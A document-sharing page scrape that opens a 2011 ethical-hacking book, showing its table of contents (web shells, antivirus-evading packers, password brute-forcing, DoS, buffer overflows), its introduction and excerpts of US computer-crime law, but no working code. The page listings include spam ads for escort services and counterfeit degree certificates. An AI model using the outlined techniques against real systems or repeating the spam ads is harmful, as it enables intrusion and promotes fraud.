 
Expert oracle database architecture
Expert oracle database architectureExpert oracle database architecture
Expert oracle database architectureairy6548
 
National Security Implications of virtual currency examining the potential fo...
National Security Implications of virtual currency examining the potential fo...National Security Implications of virtual currency examining the potential fo...
National Security Implications of virtual currency examining the potential fo...Dmitry Tseitlin
 
DotNet &amp; Sql Server Interview Questions
DotNet &amp; Sql Server Interview QuestionsDotNet &amp; Sql Server Interview Questions
DotNet &amp; Sql Server Interview QuestionsNeeraj Kaushik
 
irmpg_3.7_python_202301.pdf
irmpg_3.7_python_202301.pdfirmpg_3.7_python_202301.pdf
irmpg_3.7_python_202301.pdfFernandoBello39
 
Information security
Information securityInformation security
Information securityHai Nguyen
 
SafeDNS Content Filtering Service Guide
SafeDNS Content Filtering Service GuideSafeDNS Content Filtering Service Guide
SafeDNS Content Filtering Service GuideSafeDNS
 
Sonic os standard_3_9_administrators_guide
Sonic os standard_3_9_administrators_guideSonic os standard_3_9_administrators_guide
Sonic os standard_3_9_administrators_guideAshwani Singh
 
PSpice 17.2 User Guide (pspug).pdf
PSpice 17.2 User Guide (pspug).pdfPSpice 17.2 User Guide (pspug).pdf
PSpice 17.2 User Guide (pspug).pdfNiranjan kumar
 

Similar to Hacker techniques, exploit and incident handling (20)

Guia definitiva de shodan
Guia definitiva de shodanGuia definitiva de shodan
Guia definitiva de shodan
 
DFIR
DFIRDFIR
DFIR
 
Linux for professional
Linux for professionalLinux for professional
Linux for professional
 
Linux note for professionals
Linux note for professionalsLinux note for professionals
Linux note for professionals
 
Easttom C. Computer Security Fundamentals 3ed 2016.pdf
Easttom C. Computer Security Fundamentals 3ed 2016.pdfEasttom C. Computer Security Fundamentals 3ed 2016.pdf
Easttom C. Computer Security Fundamentals 3ed 2016.pdf
 
fundamentals of linux
fundamentals of linuxfundamentals of linux
fundamentals of linux
 
fundamentals of linux
fundamentals of linuxfundamentals of linux
fundamentals of linux
 
fundamentals of linux
fundamentals of linuxfundamentals of linux
fundamentals of linux
 
Expert oracle database architecture
Expert oracle database architectureExpert oracle database architecture
Expert oracle database architecture
 
National Security Implications of virtual currency examining the potential fo...
National Security Implications of virtual currency examining the potential fo...National Security Implications of virtual currency examining the potential fo...
National Security Implications of virtual currency examining the potential fo...
 
DotNet &amp; Sql Server Interview Questions
DotNet &amp; Sql Server Interview QuestionsDotNet &amp; Sql Server Interview Questions
DotNet &amp; Sql Server Interview Questions
 
irmpg_3.7_python_202301.pdf
irmpg_3.7_python_202301.pdfirmpg_3.7_python_202301.pdf
irmpg_3.7_python_202301.pdf
 
Information security
Information securityInformation security
Information security
 
SafeDNS Content Filtering Service Guide
SafeDNS Content Filtering Service GuideSafeDNS Content Filtering Service Guide
SafeDNS Content Filtering Service Guide
 
Sonic os standard_3_9_administrators_guide
Sonic os standard_3_9_administrators_guideSonic os standard_3_9_administrators_guide
Sonic os standard_3_9_administrators_guide
 
Windows XP Registry Guide
Windows XP Registry GuideWindows XP Registry Guide
Windows XP Registry Guide
 
PSpice 17.2 User Guide (pspug).pdf
PSpice 17.2 User Guide (pspug).pdfPSpice 17.2 User Guide (pspug).pdf
PSpice 17.2 User Guide (pspug).pdf
 
Dynamics AX/ X++
Dynamics AX/ X++Dynamics AX/ X++
Dynamics AX/ X++
 
Rand rr3242 (1)
Rand rr3242 (1)Rand rr3242 (1)
Rand rr3242 (1)
 
Rand rr3242
Rand rr3242Rand rr3242
Rand rr3242
 

More from Rafel Ivgi

Java secure development part 3
Java secure development   part 3Java secure development   part 3
Java secure development part 3Rafel Ivgi
 
Java secure development part 2
Java secure development   part 2Java secure development   part 2
Java secure development part 2Rafel Ivgi
 
Implementing and auditing security controls part 2
Implementing and auditing security controls   part 2Implementing and auditing security controls   part 2
Implementing and auditing security controls part 2Rafel Ivgi
 
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...Rafel Ivgi
 
Firmitas Cyber Solutions - Inforgraphic - ICS & SCADA Vulnerabilities
Firmitas Cyber Solutions - Inforgraphic - ICS & SCADA VulnerabilitiesFirmitas Cyber Solutions - Inforgraphic - ICS & SCADA Vulnerabilities
Firmitas Cyber Solutions - Inforgraphic - ICS & SCADA VulnerabilitiesRafel Ivgi
 
United States O1 Visa Approval
United States O1 Visa ApprovalUnited States O1 Visa Approval
United States O1 Visa ApprovalRafel Ivgi
 
Comptia Security+ CE Certificate
Comptia Security+ CE CertificateComptia Security+ CE Certificate
Comptia Security+ CE CertificateRafel Ivgi
 
ISACA Membership
ISACA MembershipISACA Membership
ISACA MembershipRafel Ivgi
 
Iso 27001 Pecb Ismsla 100193 Rafel Ivgi
Iso 27001 Pecb Ismsla 100193 Rafel IvgiIso 27001 Pecb Ismsla 100193 Rafel Ivgi
Iso 27001 Pecb Ismsla 100193 Rafel IvgiRafel Ivgi
 
Webapplicationsecurity05 2010 100601100553 Phpapp02
Webapplicationsecurity05 2010 100601100553 Phpapp02Webapplicationsecurity05 2010 100601100553 Phpapp02
Webapplicationsecurity05 2010 100601100553 Phpapp02Rafel Ivgi
 

More from Rafel Ivgi (14)

Java secure development part 3
Java secure development   part 3Java secure development   part 3
Java secure development part 3
 
Java secure development part 2
Java secure development   part 2Java secure development   part 2
Java secure development part 2
 
Implementing and auditing security controls part 2
Implementing and auditing security controls   part 2Implementing and auditing security controls   part 2
Implementing and auditing security controls part 2
 
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...
Firmitas Cyber Solutions - Inforgraphic - Mirai Botnet - A few basic facts on...
 
Firmitas Cyber Solutions - Inforgraphic - ICS & SCADA Vulnerabilities
Firmitas Cyber Solutions - Inforgraphic - ICS & SCADA VulnerabilitiesFirmitas Cyber Solutions - Inforgraphic - ICS & SCADA Vulnerabilities
Firmitas Cyber Solutions - Inforgraphic - ICS & SCADA Vulnerabilities
 
United States O1 Visa Approval
United States O1 Visa ApprovalUnited States O1 Visa Approval
United States O1 Visa Approval
 
Comptia Security+ CE Certificate
Comptia Security+ CE CertificateComptia Security+ CE Certificate
Comptia Security+ CE Certificate
 
ISACA Membership
ISACA MembershipISACA Membership
ISACA Membership
 
CISSP
CISSPCISSP
CISSP
 
CISM
CISMCISM
CISM
 
LPIC-1
LPIC-1LPIC-1
LPIC-1
 
CRISC
CRISCCRISC
CRISC
 
Iso 27001 Pecb Ismsla 100193 Rafel Ivgi
Iso 27001 Pecb Ismsla 100193 Rafel IvgiIso 27001 Pecb Ismsla 100193 Rafel Ivgi
Iso 27001 Pecb Ismsla 100193 Rafel Ivgi
 
Webapplicationsecurity05 2010 100601100553 Phpapp02
Webapplicationsecurity05 2010 100601100553 Phpapp02Webapplicationsecurity05 2010 100601100553 Phpapp02
Webapplicationsecurity05 2010 100601100553 Phpapp02
 

Recently uploaded

Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130  Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130  Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Roomdivyansh0kumar0
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts servicesonalikaur4
 
Denver Web Design brochure for public viewing
Denver Web Design brochure for public viewingDenver Web Design brochure for public viewing
Denver Web Design brochure for public viewingbigorange77
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation   for Smart Assistant Application for Disabled PersonComplet Documnetation   for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Personfurqan222004
 
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...akbard9823
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一3sw2qly1
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMartaLoveguard
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Deliverybabeytanya
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 

Recently uploaded (20)

Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room

Hacker techniques, exploit and incident handling

HACKER TECHNIQUES, EXPLOIT AND INCIDENT HANDLING
Defensia, 2011
Rafel Ivgi

This book introduces the world of hacking and involves the reader with the current players, the rules of the game, motivation and new trends.
TABLE OF CONTENTS

Introduction to Ethical Hacking Problem Definition – Why? ..... 11
  How does a hacker see the world? ..... 11
Hacking - Laws www.usdoj.gov ..... 12
  United States of America: Securely Protect Yourself against - Cyber Trespass Act (SPY ACT) ..... 12
  U.S. Federal Laws ..... 13
    Section 1029 ..... 13
    Section 1030 ..... 14
    18 U.S.C. §1362 ..... 17
    18 U.S.C. §2318 - Trafficking in counterfeit… ..... 18
    18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services ..... 18
    18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law ..... 18
    47 U.S.C. §605 - Unauthorized publication or use of communications ..... 18
Foot-printing visiting Reconnaissance ..... 20
  Foot-Printing each Service Server Software Name and Version ..... 20
    Foot-Printing HTTP Servers ..... 20
    Foot-Printing FTP Servers ..... 23
    Foot-Printing Telnet Servers ..... 23
  Fingerprinting VoIP Servers ..... 24
  Fingerprinting Products of Specific Vendors ..... 24
  WHOIS ..... 28
Google Hacking What is Google hacking ..... 32
  Finding Old Vulnerable Web Pages / Fast & Passive Web Crawling/Spidering ..... 32
    Finding Login Interfaces ..... 33
  Finding Exploitable Vulnerable Web Systems by Signature ..... 34
    Choosing a public exploit ..... 34
    Finding a vulnerable website ..... 35
    Verifying the vulnerability exists ..... 37
    Exploiting the Vulnerability ..... 38
    Opening a free hosting account ..... 38
  Finding Cameras ..... 41
  Finding Password Files ..... 43
Scanning and Scanning Definition ..... 46
Enumeration Overview of System Hacking Cycle ..... 48
  Enumerating the allowed HTTP Methods on a Web Server ..... 48
  Enumerating Usernames Using Google ..... 49
    Exposed Configuration Files ..... 49
    Company Email Addresses ..... 50
  SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR) ..... 51
    Using the SMTP VRFY Command ..... 51
    Using the SMTP EXPN Command ..... 52
    Using the SMTP RCPT TO Command ..... 53
    Non Delivery Response (NDR) ..... 54
  POP3 Enumeration ..... 54
  Private User Directories ..... 56
    Apache User Enumeration ..... 56
    WordPress Authors Template User Enumeration Vulnerability ..... 56
  FTP ..... 58
    CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd) ..... 58
    FTP Server Authentication Delay Username Enumeration Vulnerability (Example: ProFTPD) ..... 58
  Telnet ..... 58
    Telnet Server User Field Account Enumeration (Example: Cisco Aironet) ..... 58
  Web Server Pre-Login – HTTP Response based enumeration (Example: Lotus Domino) ..... 58
  Error Message User Enumeration ..... 59
  NetBIOS User Enumeration ..... 59
    McAfee Foundstone SuperScan 4 ..... 61
    NetBIOS Enumerator ..... 62
    GFI LANguard ..... 63
  SNMP Enumeration ..... 63
  DNS Enumeration ..... 64
    Dictionary Based DNS Enumeration ..... 65
  Brute Forcing DNS Sub-Domains ..... 65
  VoIP User Enumeration ..... 66
    Enumerating Extensions ..... 66
    Enumerating Usernames (Example: Inter Asterisk Exchange protocol) ..... 66
  Citrix Published Applications Remote Enumeration ..... 67
System Hacking Part 1 - Cracking Passwords ..... 69
  Brute Forcing Passwords – Telnet ..... 69
  Cracking Accounts Using Hydra ..... 69
  Cracking Accounts Using Medusa ..... 70
  Brute Forcing Check Point Client Authentication Remote Service ..... 71
  Brute Forcing Citrix ICA Servers ..... 71
Trojans and Backdoors Effect on Business ..... 76
  Auto Dialers ..... 77
  FraudWare ..... 77
  Keylogger ..... 78
  Spyware & Browser Trojans ..... 79
  Trojans ..... 79
  Password Stealers ..... 79
  RansomWare ..... 80
Viruses and Worms Virus History ..... 82
  Local Replicating Viruses ..... 82
  Worms ..... 83
  Antivirus ..... 83
  Packers/Crypters – Bypassing Anti-Viruses ..... 84
    Netcat - Original – Less Than Packed ..... 85
    Netcat * RDG PolyPack v1.1 ..... 88
    Poison Ivy ..... 89
    SCPack 1.1 ..... 89
    Alternate EXE Packer ..... 91
    Alternate EXE Packer ..... 92
    Poison Ivy * MEW ..... 93
    Poison Ivy * ACprotect ..... 94
    sixxpack v2.2Eng ..... 95
  DotFuscator ..... 95
Sniffers Definition – Sniffing ..... 98
  Man in the Middle ..... 98
  Hub vs. Switch ..... 98
  MAC Spoofing ..... 99
  MAC Flooding / CAM Table Overflow ..... 100
    Description ..... 100
    MAC Flooding ..... 100
  Port Stealing ..... 102
  STP mangling ..... 104
  Address Resolution Protocol (ARP) Spoofing ..... 104
  IP Spoofing ..... 105
  VLANs ..... 106
  ICMP Redirect ..... 107
  Public Key Exchanging ..... 109
  Command Injection ..... 110
  Malicious Code Injection ..... 110
  Downgrade Attacks - SSH V2 to V1 ..... 110
    Downgrade Attacks - SSH V2 to V1 ..... 110
  Downgrade Attacks - IPSEC Failure ..... 110
  Downgrade Attacks – PPTP ..... 111
    PPTP ..... 111
Social Engineering ..... 112
  Email Spoofing ..... 112
  Social Engineering Tool-Kit ..... 114
  Tab-Nabbing ..... 119
  ClickJacking / Interface Spoofing ..... 119
Phishing ..... 121
  Diversion theft ..... 121
  Quid pro quo ..... 122
  Social Engineering - Source Validation ..... 122
  Pretexting – Collecting Names, Emails & Phone Numbers ..... 123
  Pretexting – Collecting Names & Roles ..... 124
  Target and Attack ..... 125
  Social Engineering by Phone ..... 126
  Dumpster Diving ..... 127
  On-Line Social Engineering ..... 127
  Persuasion ..... 128
  Reverse Social Engineering ..... 129
Hacking Email Accounts ..... 130
  Key-logging: The Easiest Way! ..... 130
  Phishing: The Difficult Way ..... 130
  Common Myths and Scams Associated with Email Hacking ..... 130
Denial-of-Service Real World Scenario of D.o.S Attacks ..... 132
  Ping of Death ..... 132
  Permanent denial-of-service attacks – PDOS ..... 132
  IP Spoofing ..... 133
  Land Attack ..... 133
  SYN Flood ..... 134
  SYN Flood + IP Spoofing ..... 136
  Reflected attack: Source IP Spoofing + SYN Sent ..... 137
  Distributed attack – DDOS ..... 138
  Amplification/Smurf attack ..... 140
Session Hi-Jacking - What is Session Hi-Jacking? ..... 142
Hacking Web Servers How Web Servers Work ..... 148
  Components of a generic web application system ..... 148
  URL mappings to the web application system ..... 149
  Flowchart for a one-way web hack ..... 150
  Finding the entry point ..... 151
    Exploiting poorly validated input parameters ..... 152
    Exploiting SQL injection ..... 152
    Invoking the command interpreter ..... 153
    Posting commands to CMD.EXE ..... 153
    Posting commands to /bin/sh ..... 154
    Automating the POST process ..... 155
    Output of post_cmd.pl ..... 155
    Web based command prompt ..... 157
    Perl - perl_shell.cgi ..... 157
    ASP - cmdasp.asp ..... 158
    PHP - sys.php ..... 160
    JSP - cmdexec.jsp ..... 160
    Installing the Web based command prompt ..... 161
    Re-creating arbitrary binary files ..... 162
  File uploader ..... 162
    ASP - upload.asp and upload.inc ..... 162
    Perl - upload.cgi ..... 163
    PHP - upload.php ..... 164
  One-Way Privilege Escalation ..... 165
Web Application Vulnerabilities Web Application Setup ..... 169
  XSS – Cross-Site-Scripting ..... 169
    Introduction ..... 169
    Reflected XSS (Type I) ..... 169
    Permanent (Stored) XSS ..... 170
    DOM XSS ..... 170
    XSS-Shell ..... 170
    XSS Worms ..... 171
    The Future of SPAM ..... 171
    D.o.S attacks ..... 172
    Information Gathering ..... 173
    Automated exploiting bots ..... 173
    Malware Script Detector ..... 174
  Cross Site Request Forgery (CSRF/XSRF/Session Riding) ..... 174
    Introduction ..... 174
    The risks and common uses ..... 175
    Tokens vs. Personal Information as a solution for CSRF ..... 176
  Open/Un-Validated Site Redirection / Cross Domain Redirect ..... 177
    Common uses and Risks ..... 178
    Validating Redirects and Forwards ..... 179
SQL-injection - What is SQL Injection? ..... 180
  Introduction ..... 180
  The Practice ..... 181
    Error Based SQL Injection ..... 181
    Union Based SQL Injection ..... 181
    Taking Over the Machine ..... 182
  SQL injection as a lead to other vulnerabilities ..... 183
  SQL injection Automated tools ..... 183
  SQL injection Prevention ..... 185
Web-Based Password Cracking Techniques Authentication – Definition ..... 186
Hacking Wireless Networks ..... 193
  Introduction ..... 193
  Wireless LAN Overview ..... 193
    Stations and Access Points ..... 194
    Channels ..... 194
    WEP ..... 194
    Infrastructure and Ad Hoc Modes ..... 194
    Frames ..... 195
    Authentication ..... 195
    Association ..... 196
  Wireless Network Sniffing ..... 197
    Passive Scanning ..... 197
    Detection of SSID ..... 198
    Collecting the MAC Addresses ..... 198
    Collecting the Frames for Cracking WEP ..... 199
    Detection of the Sniffers ..... 200
  Wireless Spoofing ..... 200
    MAC Address Spoofing ..... 200
    IP spoofing ..... 200
    Frame Spoofing ..... 201
  Wireless Network Probing ..... 201
    Detection of SSID ..... 202
    Detection of Probing ..... 202
  AP Weaknesses ..... 202
    Configuration ..... 203
    Defeating MAC Filtering ..... 203
    Rogue AP ..... 203
    Trojan AP ..... 203
    Equipment Flaws ..... 203
  Denial of Service ..... 204
    Jamming the Air Waves ..... 204
    Flooding with Associations ..... 204
    Forged Disassociation ..... 205
    Forged De-Authentication ..... 205
    Power Saving ..... 205
  Man-in-the-Middle Attacks ..... 205
    Wireless MITM ..... 206
    ARP Poisoning ..... 206
    Session Hijacking ..... 207
  War Driving ..... 207
    War chalking ..... 208
    Typical Equipment ..... 208
  Wireless Security Best Practices ..... 209
    Location of the APs ..... 209
    Proper Configuration ..... 209
    Secure Protocols ..... 210
    Wireless IDS ..... 210
    Wireless Auditing ..... 211
    Newer Standards and Protocols ..... 211
    Software Tools ..... 211
  Conclusion ..... 212
Physical Security ..... 213
  Dumpster diving ..... 213
  • 10. 9 | P a g e Overt document stealing......................................................................................................... 213 CRT vs. LCD vs. LED – Remote Screen Eavesdropping............................................................. 213 Ethernet vs. Optic Fibers ......................................................................................................... 214 Linux Hacking - Why Linux?......................................................................................................... 217 Linux/Apache privilege escalation........................................................................................... 217 Uploading the UNIX attack tools............................................................................................. 217 ptrace1.c.............................................................................................................................. 217 Evading IDS, Firewalls and Detecting Honey Pots Introduction to Intrusion.............................. 223 Introduction............................................................................................................................. 223 Honeypots versus steganography ........................................................................................... 223 Tools .................................................................................................................................... 224 User Mode Linux (UML)....................................................................................................... 224 VMware ............................................................................................................................... 227 Detecting additional lines of defense: chroot and jails....................................................... 229 Practical examples (continued) ............................................................................................... 
230 Sebek-based Honeypots...................................................................................................... 230 Snort_inline ......................................................................................................................... 231 Fake AP ................................................................................................................................ 232 Bait and Switch Honeypots.................................................................................................. 232 Summary.................................................................................................................................. 233 Conclusion ............................................................................................................................... 234 Buffer Overflows Why is Programs/Applications Vulnerable?.................................................... 235 Verify the bug.......................................................................................................................... 235 Verify the bug – and see if it could be interesting .................................................................. 236 Before we proceed – some theory.......................................................................................... 236 Process Memory.................................................................................................................. 237 The Stack ............................................................................................................................. 239 The debugger....................................................................................................................... 247 Determining the buffer size to write exactly into EIP ......................................................... 251 Find memory space to host the shellcode .......................................................................... 
255 Jump to the shellcode in a reliable way .................................................................................. 258 Get shellcode and finalize the exploit ..................................................................................... 263
  • 11. 10 | P a g e What if you want to do something else than launching calc? ................................................ 265 Heap Overflows....................................................................................................................... 270 Exploiting Heap Overflows .................................................................................................. 271 Off-By-One............................................................................................................................... 275 Signed vs. Un-Signed ............................................................................................................... 275 Memory Protection Mechanisms............................................................................................ 276 Security Cookie (Canary) ..................................................................................................... 276 SafeSEH................................................................................................................................ 277 Address Space Layout Randomization (ASLR) ..................................................................... 278 NX (No eXecute – Hardware DEP)....................................................................................... 279 NX – In Sun VM Environment.............................................................................................. 280 NX – Process Support .......................................................................................................... 281 Cryptography............................................................................................................................... 282 Hash......................................................................................................................................... 282 MD5 HASH “Reverse”.............................................................................................................. 
282 Rainbow Tables ....................................................................................................................... 284
Introduction to Ethical Hacking Problem Definition – Why?

In the past, hackers were kids who hacked in order to prove themselves the smartest community and the best technologists. After they succeeded in remotely penetrating an organization and gaining control over one of its machines, they would usually stop there and keep the vulnerability information to themselves or within their close community circle. Today, hackers are people of all ages, motivated mostly by money. Where in the past a White-Hat hacker, known as a "Security Researcher", would publish an information security advisory for free, to build a reputation and create new career opportunities, today those security vulnerabilities are worth tens of thousands of dollars and are sold to private companies. The cracking scene has changed in the same way. In the past it was composed of a few famous groups such as Myth, Fair-Light, Divine, Deviance and Paradigm, mostly collections of teenagers interested in software piracy who believed in creating "a money free world where all computer games and software are available to the rich and the poor". Today the cracking scene has shrunk to its core, and most crack download portals are driven by organized crime, which deliberately ships free software cracks bundled with a Trojan downloader, building computerized armies controlled through a botnet.

How does a hacker see the world?

The world's computer industries work to provide solutions to the needs of normal users. The solution begins with an initiative or startup venture, is designed by the Chief Architect and passed down the chain to a product manager, who defines the user needs and the optimal user experience, and then down to a software developer, who implements the defined requirements in practice.
It is important to remember that all of the people in this chain are normal people with a single unified mission: creating a specific solution for a user or organization. A true hacker is not a user and is not just a developer or an architect; where the system's security is concerned, he is all of them at once. The hacker reviews the system and inspects the way information flows between each level of the system as a whole, from the application level all the way down to the bits leaving the machine's network interface. For the hacker, the graphical user interface is just a mask over the underlying truth, which he uncovers with hacking tools. A system can run in production for years and be used by thousands of normal and advanced users without anyone noticing an obvious security flaw that a hacker can pick up in a few minutes. That is why a system that has not been approved for use by a hacker is not safe from one.
Hacking - Laws www.usdoj.gov

United States of America: Securely Protect Yourself against - Cyber Trespass Act (SPY ACT)

SEC. 2. PROHIBITION OF [UNFAIR OR] DECEPTIVE ACTS OR PRACTICES RELATING TO SPYWARE.
(a) Prohibition- It is unlawful for any person, who is not the owner or authorized user of a protected computer, to engage in unfair or deceptive acts or practices that involve any of the following conduct with respect to the protected computer:
(1) Taking control of the computer by:
(A) Utilizing a computer to send unsolicited information or material from the computer to other computers;
(B) Diverting the Internet browser of the computer, or similar program of the computer used to access and navigate the Internet: (i) without authorization of the owner or authorized user of the computer; and (ii) away from the site the user intended to view, to one or more other Web pages, such that the user is prevented from viewing the content at the intended Web page, unless such diversion is otherwise authorized;
(C) Accessing, hijacking, or otherwise using the modem, or Internet connection or service, for the computer and thereby causing damage to the computer or causing the owner or authorized user or a third party defrauded by such conduct to incur charges or other costs for a service that is not authorized by such owner or authorized user;
(E) Delivering advertisements that a user of the computer cannot close without undue effort or knowledge by the user or without turning off the computer or closing all sessions of the Internet browser for the computer.
(2) Modifying settings related to use of the computer or to the computer's access to or use of the Internet by altering:
(A) the Web page that appears when the owner or authorized user launches an Internet browser or similar program used to access and navigate the Internet;
(B) the default provider used to access or search the Internet, or other existing Internet connections settings;
(3) Collecting personally identifiable information through the use of a keystroke logging function;
(4) Inducing the owner or authorized user of a computer to disclose personally identifiable information by means of a Web page that:
(A) is substantially similar to a Web page established or provided by another person; and
(B) misleads the owner or authorized user that such Web page is provided by such other person.

U.S. Federal Laws
• 18 U.S.C. §1029. Fraud and Related Activity in Connection with Access Devices
• 18 U.S.C. §1030. Fraud and Related Activity in Connection with Computers
• 18 U.S.C. §1362. Communication Lines, Stations, or Systems
• 18 U.S.C. §2510 et seq. Wire and Electronic Communications Interception and Interception of Oral Communications
• 18 U.S.C. §2701 et seq. Stored Wire and Electronic Communications and Transactional Records Access

Section 1029

Subsection (a) applies to whoever:
(1) Knowingly and with intent to defraud produces, uses, or traffics in one or more counterfeit access devices;
(2) Knowingly and with intent to defraud traffics in or uses one or more unauthorized access devices during any one-year period, and by such conduct obtains anything of value aggregating $1,000 or more during that period;
(3) Knowingly and with intent to defraud possesses fifteen or more devices which are counterfeit or unauthorized access devices;
(4) Knowingly, and with intent to defraud, produces, traffics in, has control or custody of, or possesses device-making equipment;
(5) Knowingly and with intent to defraud effects transactions, with 1 or more access devices issued to another person or persons, to receive payment or any other thing of value during any 1-year period the aggregate value of which is equal to or greater than $1,000;
(6) Without the authorization of the issuer of the access device, knowingly and with intent to defraud solicits a person for the purpose of:
(A) Offering an access device; or
(B) Selling information regarding or an application to obtain an access device;
(7) Knowingly and with intent to defraud uses, produces, traffics in, has control or custody of, or possesses a telecommunications instrument that has been modified or altered to obtain unauthorized use of telecommunications services;
(8) Knowingly and with intent to defraud uses, produces, traffics in, has control or custody of, or possesses a scanning receiver;
(9) Knowingly uses, produces, traffics in, has control or custody of, or possesses hardware or software, knowing it has been configured to insert or modify telecommunication identifying information associated with or contained in a telecommunications instrument so that such instrument may be used to obtain telecommunications service without authorization; or
(10) Without the authorization of the credit card system member or its agent, knowingly and with intent to defraud causes or arranges for another person to present to the member or its agent, for payment, 1 or more evidences or records of transactions made by an access device.
The Punishments:
(A) In the case of an offense that does not occur after a conviction for another offense under this section:
(i) If the offense is under paragraph (1), (2), (3), (6), (7), or (10) of subsection (a), a fine under this title or imprisonment for not more than 10 years, or both; and
(ii) If the offense is under paragraph (4), (5), (8), or (9) of subsection (a), a fine under this title or imprisonment for not more than 15 years, or both;
